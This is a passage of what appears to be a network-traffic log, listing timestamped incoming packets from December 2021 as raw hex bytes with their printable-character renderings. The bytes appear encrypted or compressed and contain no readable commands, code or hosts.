7a 98 d2 61 62 bb 8a 25 de 11 84 4f 80 bf ed 93 e7 85 df 52 4b c9 Data Ascii: xdzgnC!Le8aoZn)Uwy"V"WSy0p_u$Bs}(N4nMUeHEr*HPQQ6ZxDR6M5=#PIc?TrGh H?U[XH\N1Q,my&0l?/[DNm(&zab%ORK
2021-12-01 18:26:22 UTC	215	IN	Data Raw: fe fd ca 9f 31 d8 b3 15 cc 66 ea f4 cb 23 86 83 aa e0 b8 ff 61 a8 84 1a ba b8 b3 0c 84 29 1f a2 28 1b e2 19 3b f4 f9 8e c9 be b4 30 45 dd 58 8b dc cc c8 f0 5d 7e 88 86 44 12 38 da 04 76 f9 49 e4 b8 b1 55 7b b4 ff 0f 7c 45 fc 27 ca 03 69 9b 76 90 de 8e cc ff 0e f1 0f 55 a9 cb 1c 27 d2 a0 bb 3d 2d e2 bb 61 a9 f0 3e cb ad 01 68 f2 f7 0d 3b e5 85 4f 01 29 cb 6c 06 d6 7e a1 9b 61 1f 1e d3 a5 d1 de 12 41 2f 0c eb 41 53 34 81 6b b4 75 4a 14 73 df 85 38 40 d8 5e 19 62 26 a2 93 7b 95 b5 31 10 52 c8 0d c9 5f b4 5e db f5 1f 79 33 2d 21 55 c5 61 08 f8 ca a6 ea e2 28 84 c4 5c 76 90 aa 88 9c 6b 0c 92 c6 e5 6e 22 c2 db 8e af 28 3b 10 eb 7a c6 46 4f c5 4f 1e fd 9d 41 99 bb 1e e6 66 8f c9 5b 33 33 3d 5a 48 2f be f4 de 2c 42 17 2a b8 12 f3 c8 a8 c2 64 aa 7f 17 c3 59 e8 d7 Data Ascii: 1f#a)(;0EX]~D8vIU{\|E'ivU'=-a>h;O)l~aA/AS4kuJs8@^b&{1R_^y3-!Ua(\vkn"(;zFOOAf[33=ZH/,B*dY
2021-12-01 18:26:22 UTC	217	IN	Data Raw: f3 44 9f 4a 66 85 05 ca c5 c8 b2 22 de 9f 74 e7 a8 02 69 bb 36 6d 2f 72 f2 75 5d a9 fa dc 0d 45 d1 ef 66 d4 09 80 4f 4e d6 2c 20 8b 4d 6a 04 a5 57 02 12 82 91 10 e0 90 f1 32 3c 52 fa 9d 80 cc 8e c3 e2 20 97 35 ac 6e 67 23 04 44 62 58 d8 71 b0 bd de 55 54 0c 5c a0 46 8f 85 a5 a5 40 2b 29 04 81 6d 20 8f cc 0c 81 5b 61 38 9f 63 0f 6f a7 38 2f fa ae ae fd c0 4e 8b b1 88 83 fe af d7 d3 2a 35 4a da a1 2a 62 0c 9a af ab 5a 1d b0 1f 7a c1 59 d1 73 22 a8 a6 2f b5 6a d0 95 48 37 2b 67 ef 0e 6a c8 51 11 64 ea 6e 4e dc 53 2b f1 a0 4c 65 de 4a 11 25 c1 30 43 30 01 af 97 91 a2 db 72 85 ef 9f b4 4b 26 7f 29 cb a9 c8 30 cc 01 78 00 10 b8 20 ab 61 a4 ac 75 5a c1 c9 17 17 1a 94 2f 3f ba 0d f4 37 e7 fb 01 f1 34 5c ad 6e 35 b8 7a b3 48 e5 3f 0b 68 a1 32 3a ad 25 47 23 60 53 Data Ascii: DJf"ti6m/ru]EfON, MjW2<R 5ng#DbXqUT\F@+)m [a8co8/N5JbZzYs"/jH7+gjQdnNS+LeJ%0C0rK&)0x auZ/?74\n5zH?h2:%G#`S
2021-12-01 18:26:22 UTC	218	IN	Data Raw: 96 45 85 fd b2 05 85 99 8d b6 fa 66 80 1f 79 36 05 db 30 09 ad 72 83 e3 dc 24 f4 6e 6e e2 13 36 17 de e7 95 f4 de 72 ef 67 f3 74 57 e4 d1 dc be af 2e f3 16 74 23 75 81 6b 49 98 57 aa f6 43 98 ea c5 53 57 71 18 93 b4 c5 fb 86 7b 8f ef 31 8c 20 44 10 0f 50 7e 14 13 49 d2 28 99 88 6d aa a7 9b f3 89 7d 5f a3 41 fd 3f 38 61 d6 b6 c1 6d 0e 8a cd bf 2b 24 6a bc fe db db b2 9e 4d 16 87 84 4d 82 e3 79 59 2a bd 09 66 d7 84 26 54 ed 0c 90 3f b9 2e f1 e0 38 de fe ed 82 90 a8 2d f8 18 ff dc 0f 3d 47 59 0d a9 d2 6a 0b 8b 52 96 07 7c 06 fb ac 7a 78 80 fa cf f5 5e bd 01 92 44 85 1f 9f c8 ea 33 66 19 6b b6 86 b8 95 e8 78 a6 70 86 48 3b 14 47 3a 2a f7 79 4f f6 b3 10 66 19 44 46 c2 92 93 6d 29 e6 4f 18 91 15 30 be 06 b2 62 20 4d 5d ea 81 a3 07 a6 50 f6 0a 8a 1a 53 2f 91 bf Data Ascii: Efy60r$nn6rgtW.t#ukIWCSWq{1 DP~I(m}_A?8am+$jMMyYf&T?.8-=GYjR\|zx^D3fkxpH;G:yOfDFm)O0b M]PS/
2021-12-01 18:26:22 UTC	219	IN	Data Raw: 41 f0 1b 7c 33 e4 1c d1 f2 b8 05 04 ac d6 fb 4c d1 55 ed 7b 5d c7 60 e8 90 d4 09 cf d0 05 25 eb ba 7b e8 eb 3a 53 1c 74 2f 0c e5 91 79 14 aa bf a9 11 75 a5 5a f8 a4 88 b0 6b 7b 0d 9e 73 70 2a 2c 8d ba 26 d3 0b 7a 3f 35 9e 98 ec e5 76 3f e3 99 bf a1 50 c3 99 ab 2b 35 18 9f f3 56 4a 63 89 13 73 84 74 a8 fa ef 6d 2f 8b ca 0e dd 68 8c e7 e4 34 28 cb f0 21 fe 39 16 9b b5 2f ce ac 66 04 80 75 b9 1e 6e 14 3c bf 03 c7 85 57 b3 5d c1 30 3a 48 30 c9 ae ae c1 28 a6 44 a2 ff 84 2e a7 0d fe e7 a9 1d b4 01 9f 06 84 39 32 1e 42 9d 0d 06 70 39 60 a7 5a 86 07 33 f4 c8 c9 32 06 94 d5 0e 41 4d 9f 68 eb 6a 55 ce b3 e6 c2 5b 9d b0 2f cb c8 52 d9 62 48 46 c7 63 36 ee ec 72 3e 67 7d 86 bd 70 00 a7 7e 76 de 6d d8 ba cd 24 d0 42 a7 c7 bf b7 79 c6 72 1e 2f e7 3a a2 84 17 64 b9 d5 Data Ascii: A\|3LU{]`%{:St/yuZk{sp*,&z?5v?P+5VJcstm/h4(!9/fun<W]0:H0(D.92Bp9`Z32AMhjU[/RbHFc6r>g}p~vm$Byr/:d
2021-12-01 18:26:22 UTC	221	IN	Data Raw: f3 b9 51 91 98 b5 36 fa a0 d2 d3 43 44 a6 a6 ac 28 e7 df 25 91 b2 de 3b e9 fe a0 bf 5f 91 5d f9 66 f2 b2 b8 d7 21 e2 70 99 c8 62 80 24 50 60 e0 9d 35 07 de aa 52 95 fb 8e 47 ff e0 ae 42 27 5b 4c 1b fa 4a 7e 74 fd c0 fb e4 bc 99 a1 be 5e e8 aa 9c 8c ba b4 6f 82 05 55 28 5c 83 50 dc 9b df c3 ac ed fd cb b9 c5 00 92 4a 44 57 e1 39 af 5e 52 18 79 a4 91 de 4c b1 2b 36 38 7a 7e 18 9b 9f 9e 7f ed 0e 5b 41 66 19 ac 5c 80 92 1a 7a f2 13 07 e0 a5 15 bd 3b 6c 42 62 a9 4a ba a4 89 a3 cc e6 af 09 02 3b 56 35 43 7a 9b de 04 80 1c 85 25 7e ca aa c2 da 76 2f c2 63 10 20 97 99 a8 63 63 c5 78 3b 17 4b 74 1a ee e2 f6 9a 37 84 3c 13 50 7d fb e0 50 31 9b ae f1 d3 65 1c bd d6 67 8e 64 97 8e 89 b8 93 c3 5c 02 06 a9 20 c1 a6 41 f1 68 87 67 ed c3 20 3a fd 83 4d f7 26 9b 7b d2 07 Data Ascii: Q6CD(%;_]f!pb$P`5RGB'[LJ~t^oU(\PJDW9^RyL+68z~[Af\z;lBbJ;V5Cz%~v/c ccx;Kt7<P}P1egd\ Ahg :M&{
2021-12-01 18:26:22 UTC	222	IN	Data Raw: ed db e1 3d c3 64 9e ea e2 b9 9e c8 76 27 40 cd ea e2 da 1b ae 65 90 8c 12 0a a3 fd 0c 2d cb f0 54 6e 59 2e 80 33 d0 ce 34 d2 51 e1 25 63 05 19 f7 c1 d2 1e 79 7a ba ff b9 83 03 48 43 42 76 73 69 dd 96 59 eb f9 e0 5f e4 c4 33 cc 47 08 cb 3a 21 af bb 9b 40 9c b7 ea 83 28 29 02 1d 8c 06 f3 15 3c 45 76 5c 8e b7 37 e4 19 42 ee 8d f2 1b 88 11 2f 9e 3e aa 6d 2a 7d 28 2c 35 c8 e9 c3 b9 71 fa d1 b7 c9 9a 5c 1f 75 53 74 5d 0e 41 64 3f 5b 1a ca da d8 bb 15 6c d7 98 b8 1c ba 03 af ee 8d 64 87 82 a0 1c 91 8e 5a dc c5 6d f7 d3 b3 c0 96 db 61 c1 65 1d a7 9d e8 0d 0d c7 53 21 9b 35 1c 6b 1c 69 82 e4 ba 96 66 10 66 da a8 e2 cb ef 38 75 20 1a ee 70 d8 c7 ce fb f1 7e c7 61 c5 ca 5e 5e ed 86 94 d5 9d f4 33 f2 c5 24 5f 93 76 e1 d7 20 99 24 a9 c9 6f c8 47 0e b3 bd 06 30 9d 1d Data Ascii: =dv'@e-TnY.34Q%cyzHCBvsiY_3G:!@()<Ev\7B/>m*}(,5q\uSt]Ad?[ldZmaeS!5kiff8u p~a^^3$_v $oG0
2021-12-01 18:26:22 UTC	223	IN	Data Raw: 01 18 99 5d b6 15 76 db 73 7a 3b 19 a8 d9 3f 62 11 c5 09 48 ea 7e 3a 81 39 7a 1f 03 19 79 e1 c0 2f 0d be b7 c3 bc b2 3b bb 4c 19 27 7d 44 56 a4 44 16 69 05 2c 49 b5 60 f2 ab 2c ad f0 a5 15 bd f8 44 75 d8 8a 18 d0 a4 d9 c2 65 42 63 3f 04 0b aa 8f 30 7c 90 26 00 58 e8 25 57 c4 6a 12 40 8a 1c 2c f1 d7 81 07 41 df 45 96 22 35 0c b1 8d c0 ea 1a f6 24 f6 9a de 40 bb 66 58 38 ff 4f 22 1e 67 ad 2c 69 a3 b3 fe 9d 7e cc 0e 24 1c 76 9e af 88 0f b2 1c 60 67 05 d3 19 85 91 2b 15 bc c3 1d 38 fe c1 b2 7d 36 9e 3f c7 63 2d d4 11 4a 3f 1d fd 3c 4e 3c db 26 09 80 6e 6b 0d c7 f2 54 83 b3 f8 6c f9 be e7 d3 ee 66 ad 92 3d 71 c6 77 80 df 89 7b 61 2e 31 20 9b 82 26 b1 c4 80 81 77 c1 f3 c3 cf 37 02 f2 9d 13 74 1f 7b 7d ad aa da 0d bd d1 e3 92 d4 09 5b 87 df 3d 9a db 37 71 fe 79 Data Ascii: ]vsz;?bH~:9zy/;L'}DVDi,I`,DueBc?0\|&X%Wj@,AE"5$@fX8O"g,i~$v`g+8}6?c-J?<N<&nkTlf=qw{a.1 &w7t{}[=7qy
2021-12-01 18:26:22 UTC	224	IN	Data Raw: 25 d6 c7 e9 29 4a 70 39 60 8f 5a a1 3a 33 f4 2d 3d 86 6f 7c 7d 11 9a 82 fc 99 a3 8d 27 d2 1a ba 8e 6f bd 7a 46 62 df 4f c7 b9 9b 25 e5 d2 d5 9c 0a 9a 66 27 7d 0e f1 6c ee b0 f1 5a 4b 93 aa 89 8d 6c 68 3a 92 e3 af 0f 52 e3 a9 fd af 85 fa 1c 7b 17 64 b9 ed 06 ec fb 39 1f 96 e2 b9 31 5b da 7c 72 0b f5 ae 83 af 27 8c 14 b2 1d 9e ea 91 93 59 0e b4 60 09 db 2d 27 be 2d 90 01 45 3f 13 7d fc 10 f0 92 5c 57 0b 24 d8 a5 f9 ac a5 f4 3f 08 40 d6 8d 0d b7 be 28 7c 48 be f0 d7 8e 61 de 12 a8 79 97 fc e8 e2 d5 b5 7b 49 63 05 f0 a0 f0 5d f4 77 87 99 11 38 da de 2a 10 6d 82 e0 33 18 19 e2 74 83 d4 61 67 37 47 2f ed 0c 67 1d 7a f9 95 17 72 4d 02 31 4c c5 38 1d 2a ad da b6 24 db 12 6f a4 d4 16 1b 32 74 68 1a 4a cc 4f fd 5f cf 21 65 ad 3c e1 8b 0c b7 f8 3d 40 9e 57 69 9d 92 Data Ascii: %)Jp9`Z:3-=o\|}'ozFbO%f'}lZKlh:R{d91[\|r'Y`-'-E?}\W$?@(\|Hay{Ic]w8m3tag7G/gzrM1L8$o2thJO_!e<=@Wi
2021-12-01 18:26:22 UTC	226	IN	Data Raw: 25 76 9e 51 7d e9 77 13 37 1d 33 cf 53 64 18 b8 8c 2d 8b 25 6b 2e 3d 6f 7c 2e b4 db a2 a7 e7 05 ee 7f 10 d8 82 9c 7d 0b a4 d7 f6 ce fd f1 a7 98 0b 59 9b eb 30 ef 59 7a 9e 46 2c 62 90 49 10 68 6b b0 aa fc fa f8 c0 98 44 b7 8d 87 fe 29 4c 47 8a 32 45 12 62 0e 1e da 91 3a 6b 77 3f bd c9 25 b1 31 d3 18 5e 23 b5 8c d1 9d a3 75 00 5b be 48 7f 16 cf 2c 37 9e ca ae d1 2f 4a 04 36 59 e7 52 da 0b 95 c5 67 b0 b0 ea 87 55 0c bf 81 56 a4 21 6c 87 f9 2d 73 55 7d 42 7d 3c ae c6 6b 59 23 7f a5 ce eb 43 b8 7f 01 59 b5 dc 80 fb 47 7d 22 04 e7 e4 80 c9 51 fb 22 86 8e c0 ce 04 93 09 80 e5 8f 8d 73 6f e1 2b d3 62 2c 25 6f af 34 25 ab d9 41 18 0b 0a db 7a d9 d6 0b 34 43 65 20 92 df ec 67 fd 69 5f 44 07 6f 6d a0 86 5a a7 38 02 08 e3 e9 ab 43 15 3a 5c 14 f3 f6 7d 85 06 18 8d 8e Data Ascii: %vQ}w73Sd-%k.=o\|.}Y0YzF,bIhkD)LG2Eb:kw?%1^#u[H,7/J6YRgUV!l-sU}B}<kY#CYG}"Q"so+b,%o4%Az4Ce gi_DomZ8C:\}
2021-12-01 18:26:22 UTC	227	IN	Data Raw: 11 84 fc ce 6b 5e 92 cc 7a 5d 58 d1 27 97 7c fd 7e 47 41 65 40 e0 bb 38 e4 15 b8 c1 0c 3a 60 27 51 6e 2e 33 aa a2 fd 50 7a 13 7c 28 b1 5d 58 e6 2b f4 a1 2e 55 15 55 81 5b 5a 00 62 54 f9 02 bb 10 0c 93 5f e1 21 ce 7e 98 95 5c 94 c8 f7 38 9a ec 7d 09 5f 19 8b 23 e7 ca b0 87 04 49 1d 31 9e 7d 26 84 aa cd 73 2d ed cb d7 60 12 9c 86 14 15 7f 3f 93 ee 09 6c 1e 1b 4b 21 32 8a 1e f1 57 3d 4c c4 ec a5 a3 f3 ed b6 ad cf bb bb 6d 0f 22 e3 a2 15 78 97 82 fc 51 e5 59 aa 36 41 89 6c 35 9e ab 8a f8 68 03 97 a8 91 39 49 c7 f9 1c 4d 03 d7 17 cc de be e2 d8 e1 00 24 3e ee 6a 25 93 dc 46 59 53 97 84 90 23 31 05 35 31 8d 08 a3 43 6d ac 8e 62 6d 86 ad 60 b8 44 2b 75 fc 19 db 90 7d 91 d7 1a 65 c4 2f 4d d6 9f d1 11 90 ad 0e 2e fd 2c e9 83 79 bc 86 e6 4a 04 6b 80 75 32 47 a0 db Data Ascii: k^z]X'\|~GAe@8:`'Qn.3Pz\|(]X+.UU[ZbT_!~\8}_#I1}&s-`?lK!2W=Lm"xQY6Al5h9IM$>j%FYS#151Cmbm`D+u}e/M.,yJku2G
2021-12-01 18:26:22 UTC	228	IN	Data Raw: d6 d0 e5 c3 85 25 88 c0 61 6f 69 a9 8e 36 34 a3 ae 72 6d d6 8a 92 43 39 e4 be cf a7 a6 be 52 9e c5 10 14 c2 fa e0 78 99 47 8a ef 89 ee 27 d6 df a6 7f 02 12 b2 03 19 89 ed 30 c3 63 aa fa 59 b5 f4 f8 a2 ba 45 ae 4c 0c eb fc 09 a5 36 fc b5 9b 0b 38 ec ce 46 2b da 61 c4 a1 82 d7 3a 9b 7e 32 80 c3 2c 89 a3 b3 f8 a0 2f d5 2d 05 07 b5 c8 0d ef bb 76 db e9 8c 51 ad 60 aa 52 76 7b 05 d4 52 37 be e9 48 d3 b1 61 63 92 56 79 71 5b 87 5e b4 fe ed a5 34 d6 30 bf 5d 48 e9 b2 ba 78 44 01 2e 04 3d 8b de e8 fd 4d ef 5d 2f e6 dc 87 e3 d0 fb 3c 64 96 59 fc 5f 28 d2 8c 2e f2 84 20 ef 0d 1a 62 8e 5f 48 df 98 bc 37 b8 ef 7b 83 10 7a 01 0a 5a fe 2b d1 73 48 79 fa 3e 37 0a 72 9b 33 59 ce ea 31 29 98 02 ef 71 13 2b 4f f4 4b d6 a2 ca db e7 7a b5 4a 87 33 d0 b2 c9 23 54 f0 6d b7 ba Data Ascii: %aoi64rmC9RxG'0cYEL68F+a:~2,/-vQ`Rv{R7HacVyq[^40]HxD.=M]/<dY_(. b_H7{zZ+sHy>7r3Y1)q+OKzJ3#Tm
2021-12-01 18:26:22 UTC	229	IN	Data Raw: ca 57 92 03 48 73 6a 88 91 3f 3b 4a 9b 8f f0 55 80 1e 15 8e 5a a4 ef e0 ab 41 15 20 e3 0a 1f d9 9d fe e4 3a 22 b8 f7 f1 aa 52 ce d4 1d b1 18 c2 ab 2e e3 af 66 c2 0e 4c f1 56 f3 7a 16 3f f2 5c 0e 3b e5 3d 8b ec 04 51 e5 39 27 13 36 65 60 4c 4f 58 60 a7 b4 d2 c5 e3 81 6b a3 ad cb 08 a5 49 98 6f aa fa e0 63 04 25 bb 57 71 72 a3 60 97 37 c8 fb 27 46 31 b7 f0 81 d4 4a a3 06 dd 5d 79 b8 af 08 86 cb 9d 36 9a c5 31 27 25 e8 7b c0 37 96 4c 21 70 ab 43 cb 4e cc 1a a3 d6 74 89 1a 50 d7 b0 1d 48 56 a0 42 e7 cc a7 f0 9c 66 9a c5 fd d1 87 ce 89 88 6b 25 3f b9 2e ca 7c 38 e5 56 f7 41 5b aa 1d f8 08 e1 64 92 52 0d 62 51 f8 01 95 68 03 9a 36 8a 2a 23 18 e8 ce f1 d7 9a 44 72 68 10 43 3d 9e 95 90 69 c3 a1 7a 9a ae ba 41 f1 94 18 2d 89 cd de 85 89 d2 7c b4 60 d9 0b 80 0c 35 Data Ascii: WHsj?;JUZA :"R.fLVz?\;=Q9'6e`LOX`kIoc%Wqr`7'F1J]y61'%{7L!pCNtPHVBfk%?.\|8VA[dRbQh6*#DrhC=izA-\|`5
2021-12-01 18:26:22 UTC	231	IN	Data Raw: 2e ca 1e 29 ca 72 ee 69 cd a2 ec 85 13 20 99 7d 47 cb 7b e4 a1 ea f5 c0 4a a5 e1 22 90 62 2c 9d 14 11 23 de 55 52 c4 0c b6 d3 24 41 94 21 88 7b 3e f7 de a9 1c 0b 04 e0 96 a0 3e f4 a0 db 12 d8 04 fc 19 c6 ae 5e c1 d7 44 eb c5 c2 50 74 a4 d7 6d 7e 47 df 24 75 6e 11 be 7e cf ec 2f 0e 1e c5 5c 7f dd db 63 f0 0e a6 b9 a4 6f 45 59 5f 42 df 98 bc ed 37 13 21 16 d2 ed d5 86 61 43 a0 3d f0 a4 b2 ed 91 ea ee 37 63 43 b3 88 ce 6a d1 e5 ce 62 0e cd 9c 14 fd 9b e5 ea 9e 7b cd f6 dd ea 0c 7e d8 ba 64 2e e7 e5 d1 23 52 4a 08 13 f3 96 fc e0 7e 3f 9e d6 67 32 cd 61 f5 c3 dd d8 d3 6b d4 c4 ed 66 77 b0 f4 1e 55 ba 1f bd d5 c5 dd f8 ac cd e1 bd 6a 2d 3e f8 be 13 c5 39 68 93 84 80 d5 9d 29 0a 60 d3 83 e6 9d 74 2c 6e 97 59 39 4b b3 63 af 01 6a c5 cc 36 ad 9c 20 c3 db ad 75 31 Data Ascii: .)ri }G{J"b,#UR$A!{>>^DPtm~G$un~/\coEY_B7!aC=7cCjb{~d.#RJ~?g2akfwUj->9h)`t,nY9Kcj6 u1
2021-12-01 18:26:22 UTC	231	IN	Data Raw: 64 14 76 76 0a 14 b9 6b e1 5d 60 e2 46 a2 30 77 4f 59 eb 25 a5 ae 02 75 a4 4a 6e fe 88 34 b4 99 bd 1e 54 bd 42 71 40 9f 66 52 99 3a df 30 82 4e 70 6e 96 52 14 f4 a0 c9 e5 41 33 d7 94 35 14 c0 4e 5f 3b 37 f2 68 b3 38 d4 27 b5 da b3 e1 fc 69 5d 44 cc 1d 8e c0 2a 15 14 03 19 65 b4 04 dd 4f da f8 ef ad cb 97 b4 a8 ab a8 36 f0 cd b4 b2 4f 46 a0 d4 ae 41 e7 c8 3a a3 67 92 e0 de 07 4f 3c b9 3e 7c 17 ab 84 bf cf 36 e3 ad b0 5e 15 4e 52 ad 78 c8 58 fa 1a 05 c9 72 fc 52 74 34 e5 79 db f1 80 a7 40 c7 4a 05 e1 3f 8a 04 d6 5d a0 2a ee 42 96 9d eb 6f 6b 5d 2f fa 77 b3 50 14 20 55 4e 9f fe 7d a4 d7 dc 37 e7 e8 50 0c 20 97 a8 38 7e b9 2d d7 8b 39 5a 29 57 45 d6 a3 ed 5f de ba 1c 52 7e 32 bd ab 9c 37 69 d8 35 17 1d 12 fc aa 4e dc 5b 39 6f a0 ce 75 56 c0 fe 4e 52 97 43 bb Data Ascii: dvvk]`F0wOY%uJn4TBq@fR:0NpnRA35N_;7h8'i]DeO6OFA:gO<>\|6^NRxXrRt4y@J?]Bok]/wP UN}7P 8~-9Z)WE_R~27i5N[9ouVNRC
2021-12-01 18:26:22 UTC	233	IN	Data Raw: 84 70 b8 2f 69 e8 60 c9 8e 0d 2f aa 7d 2d a0 9b 62 27 f4 d2 6d c9 6f 6e d9 dd 9a a3 58 7a a7 74 ff 46 f8 48 f0 de 3f fc 64 a9 db c7 31 88 48 5d 61 4d ba e8 9a 72 bc bd c5 42 9e 8e 31 47 15 dd 9b 08 90 42 e2 32 ea ea 0a 43 31 fa cf 04 39 ef 75 93 a6 24 fe 11 1d 9e e0 a9 e6 49 31 29 1a a7 84 28 e5 0e bd 52 be 9c 5c 1d 86 28 ca 12 69 77 9e 22 ee bb 48 2d f2 91 19 af 2c 13 34 0a 2f 51 a9 23 56 73 38 d9 7e fe e3 56 71 72 2e ad 97 fb 65 31 70 10 37 84 00 21 ff 3e 53 bf 10 13 71 50 bc c8 05 2b 1d 91 6b c7 9d dc 63 7d 84 21 37 82 6d 06 21 9a 5f 40 d0 8c 6e 4a 09 d5 29 0d d3 b2 48 1d 02 57 64 c5 a1 38 a7 c3 e9 e1 db 34 36 1c 41 0f f4 05 88 be 2c 46 26 d2 40 b3 fa b6 3e cf d9 df 97 41 fb 3b 57 49 69 9e 9a 10 3b 5b 94 d7 da 20 d3 57 0e 96 72 5e e6 fe 53 62 44 f1 6c Data Ascii: p/i`/}-b'monXztFH?d1H]aMrB1GB2C19u$I1)(R\(iw"H-,4/Q#Vs8~Vqr.e1p7!>SqP+kc}!7m!_@nJ)HWd846A,F&@>A;WIi;[ Wr^SbDl
2021-12-01 18:26:22 UTC	234	IN	Data Raw: aa 86 49 e4 44 21 e0 b3 f9 2d 73 c0 f4 71 25 49 da c2 d3 d4 80 5d 7b 29 01 51 1f 0b b3 56 fe 4e e4 02 52 a8 4b 2c ef 50 c2 5c bf c9 4b f2 ae 7b 46 41 3e 96 68 da 05 25 6f e5 0b e9 ee 65 b5 d1 dc 11 d8 21 42 f0 43 f0 48 a7 9e 9e d1 dd cb 78 c5 09 a8 91 86 a1 24 7d 80 db c0 c7 60 68 bb 83 5b a8 55 67 24 e3 e9 40 b9 1c 4e 77 f1 0e c3 df 7a 91 06 20 8b 16 f8 91 97 6a a8 7d a8 6f 32 24 3c e9 f3 c9 53 86 2d 5d c0 e9 ce dc c1 3a 3f 0f 33 17 08 98 bc 59 31 11 fe 59 ff 98 de 88 55 f2 ac 75 a9 38 6b 55 c0 9c bc 60 01 9d 63 4c 04 89 65 90 a4 13 0a a3 cf 9b 7e c3 7b ef 9d a5 fd 87 33 39 80 21 22 20 9c 26 3b d7 c8 08 d4 b6 04 18 f7 7a 8f a7 80 60 5f f4 1e 02 b9 75 ad d5 59 14 e8 f6 14 30 4f f4 97 df 13 2e f9 25 af ee d7 e9 71 e7 bd e9 29 f2 f9 7e bb 6c bd ab 24 c8 80 Data Ascii: ID!-sq%I]{)QVNRK,P\K{FA>h%oe!BCHx$}`h[Ug$@Nwz j}o2$<S-]:?3Y1YUu8kU`cLe~{39!" &;z`_uY0O.%q)~l$
2021-12-01 18:26:22 UTC	235	IN	Data Raw: 80 b7 63 1c 07 a5 7e 28 b8 1d cf 0c b0 1c e6 91 63 be 76 ef 4b c7 a3 07 d7 6c 53 76 54 e4 d1 e0 b8 c5 91 19 6b 2d 13 34 d7 6d f4 ed ca 71 5e 4a 68 3e 9d 9c bf 00 59 5c 1c 18 5e 31 d8 7b 46 45 35 5a 21 ec 39 ac 40 c4 d6 be e7 7a 00 c6 7e 15 1b f2 2b de 83 a0 28 67 f5 28 2f 4d 92 f2 29 18 b7 49 d2 6f a2 72 d5 c3 de 22 96 b0 98 4f 66 9d 2e 80 50 e6 f0 4f 9d ab e0 44 1b c2 ef c4 71 1f 56 4d a2 5b 48 5b e2 6f 66 e4 07 62 1f 52 70 13 0b 54 3d 6d fd d7 9c 00 e1 21 7f 43 1c 93 88 93 56 9e c7 27 f1 d7 f2 7c 6d 2d 34 81 73 2d 3d e4 eb 23 e8 f1 ef a1 16 65 82 d5 18 23 88 3a 27 ee 0c a7 3f 47 95 a3 de dc 73 f7 5b d4 a6 6d 5e a1 4f 89 1b d6 5b f9 f8 20 26 a8 c4 40 93 4d 9f 23 11 5b 21 31 b5 df 59 99 35 ba 8e 97 1d 35 7a 39 5b 65 55 1e 75 da d2 cc 71 ca 1c 33 df 8b e7 Data Ascii: c~(cvKlSvTk-4mq^Jh>Y\^1{FE5Z!9@z~+(g(/M)Ior"Of.PODqVM[H[ofbRpT=m!CV'\|m-4s-=#e#:'?Gs[m^O[ &@M#[!1Y55z9[eUuq3
2021-12-01 18:26:22 UTC	237	IN	Data Raw: 04 81 58 1c 55 4a 04 0a f8 90 0a 1f 0f 3b 21 a4 1c ea 28 bb 94 3b 7c f1 ce b3 42 95 3e e1 65 63 15 b8 1b 97 91 2b b9 24 97 5d 19 4a c1 b8 9c f3 2a 2d 61 fa 09 ab 2e 95 48 c1 1b 94 fb 55 4e cb 52 7e f3 b9 58 c3 99 43 22 3c 0f 5b fe 59 38 ab 65 5d 23 13 66 64 f1 66 e5 91 00 e7 7d 15 2d b3 20 04 3c 7e 9d 18 91 50 ce 01 0c fb 38 b6 03 dd df 2b 68 cc ba f1 58 2b 49 38 d0 19 3e c0 32 d9 bb 70 5b 4a a6 8f de f8 5c b5 97 c3 f3 2d 77 8f 33 d2 d8 16 96 f8 25 ff 11 05 d4 bc a0 bd 62 6c d2 76 38 88 9c 1e dd 7f 05 c8 f5 fa 4e c6 78 44 43 65 7d 1f d5 1b d4 aa 59 bb 4e 18 90 8a 67 47 34 37 26 80 6a 16 ef a1 73 09 65 99 f2 ea ba 3c 0b a1 ab 05 67 68 5b 21 17 95 f1 6d bc 81 cf eb 6e 22 bb 21 50 72 b0 b8 27 c1 e1 dd a3 a5 69 3b 11 f0 a6 43 88 1c 96 9d a3 93 68 64 63 6c 70 Data Ascii: XUJ;!(;\|B>ec+$]J*-a.HUNR~XC"<[Y8e]#fdf}- <~P8+hX+I8>2p[J\-w3%blv8NxDCe}YNgG47&jse<gh[!mn"!Pr'i;Chdclp
2021-12-01 18:26:22 UTC	238	IN	Data Raw: f6 d7 7a c5 3f 9f c0 1b 73 25 8a 69 49 31 3f 5d 07 26 5d 3c b8 1e b2 1d 8f 4c d9 84 c8 cc f1 7b ee 33 3d ae 32 5a 4f 24 08 ed b1 d8 c0 46 26 91 a4 38 56 35 08 4a 9c 7d 93 8f 5a 23 94 1f e2 3f ff 65 c1 d2 e1 b2 c4 d3 2e 85 7c d7 72 50 68 f5 3f 5d 0f 0e 93 b7 20 f2 c9 9d d8 41 b4 05 a7 10 2b 0b b6 e5 18 69 e7 48 c5 73 8e c3 cb 96 ed 8e a3 34 7f c7 e8 06 92 33 92 a8 ad 2e e5 e7 29 a4 2b 62 00 a5 46 66 e9 06 b7 c5 dd e0 59 e1 2d c6 6d 4e d9 b3 65 a6 00 da 9f 0e 58 5f f5 e8 e3 8a 8a 7e ef 4a ee ce f6 5e da e7 5b 8c 3d 31 da 0f f9 35 87 c4 fe 2e e8 f2 dc 27 75 98 4b bf 20 ea c4 72 5c df 68 1e 47 fc a1 2c 53 85 a7 d9 51 1b 8f 02 fd f3 51 ad 62 90 49 d0 f8 1f 3a 59 97 1f 58 3f ee b8 17 a9 9f 26 4c 37 a0 88 32 3f 82 9a 10 6d f9 48 eb db 77 90 b5 44 9c 11 f0 9b 91 Data Ascii: z?s%iI1?]&]<L{3=2ZO$F&8V5J}Z#?e.\|rPh?] A+iHs43.)+bFfY-mNeX_~J^[=15.'uK r\hG,SQQbI:YX?&L72?mHwD
2021-12-01 18:26:22 UTC	239	IN	Data Raw: 07 ac 43 99 ad a3 11 c8 90 21 c2 ee c8 23 9e 8b f6 1a bd 4d 28 6c 6c 6a 55 a7 22 20 c6 1e fe 27 1f 3b 0f 3f 28 10 f3 61 7f 40 ce 28 48 74 40 aa ae ad ba 28 a6 9f 61 9b 93 e0 40 43 d6 0c d5 56 e0 26 6e 67 55 a4 ab da ec ef 5a 30 7e 99 74 18 7e 44 3b 9b e3 02 77 a2 47 19 16 6e 8d b7 7e 12 78 1e e4 b6 7d 21 a3 67 f6 bb 6e bd 72 d1 9a f1 2d a8 9a 2f b5 c7 b7 5a ee af 3b 37 1a 56 23 8f 45 44 7a cf 97 fa e9 6f d6 98 60 12 47 2a 25 50 72 d2 9c 4e 5f e3 84 9a a1 c3 dd 67 51 b5 ac e5 42 1f e3 11 5f e8 68 eb 3d c1 68 81 e8 8e 9b c5 20 96 76 ec 9d b3 cc bb 